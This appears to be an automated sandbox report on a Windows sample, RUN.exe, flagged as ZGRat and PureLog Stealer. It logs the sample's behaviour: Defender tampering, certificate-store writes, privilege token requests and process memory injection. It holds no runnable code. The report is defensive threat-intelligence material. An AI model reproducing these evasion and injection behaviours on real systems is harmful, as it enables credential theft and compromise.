Malware Analysis Report

2024-10-19 09:04

Sample ID 240318-xsb8xsfh83
Target RUN.exe
SHA256 148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010
Tags
zgrat evasion rat trojan purelogstealer stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

148c3096bab88a675414bd9463c60c44317f3ee5d12f949526847827cb108010

Threat Level: Known bad

The file RUN.exe was found to be: Known bad.

Malicious Activity Summary

zgrat evasion rat trojan purelogstealer stealer

ZGRat

PureLog Stealer payload

Detect ZGRat V1

Modifies security service

PureLog Stealer

Modifies Windows Defender Real-time Protection settings

Suspicious use of NtCreateUserProcessOtherParentProcess

Drops file in Drivers directory

Stops running service(s)

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Enumerates connected drives

Blocklisted process makes network request

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Delays execution with timeout.exe

Modifies registry class

Modifies system certificate store

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-18 19:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-18 19:06

Reported

2024-03-18 19:17

Platform

win7-20240215-en

Max time kernel

361s

Max time network

363s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI6F2C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6FAA.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7076.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f776dc1.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f776dc1.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6E9F.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2460 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe
PID 2460 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe
PID 2460 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe
PID 2460 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe
PID 2460 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe
PID 2460 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe
PID 2460 wrote to memory of 1412 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe
PID 1288 wrote to memory of 2248 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1288 wrote to memory of 2248 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1288 wrote to memory of 2248 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1288 wrote to memory of 2248 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1288 wrote to memory of 2248 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1288 wrote to memory of 2248 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1288 wrote to memory of 2248 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1412 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1412 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1412 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 1412 wrote to memory of 380 N/A C:\Users\Admin\AppData\Local\Temp\7zS5E08.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
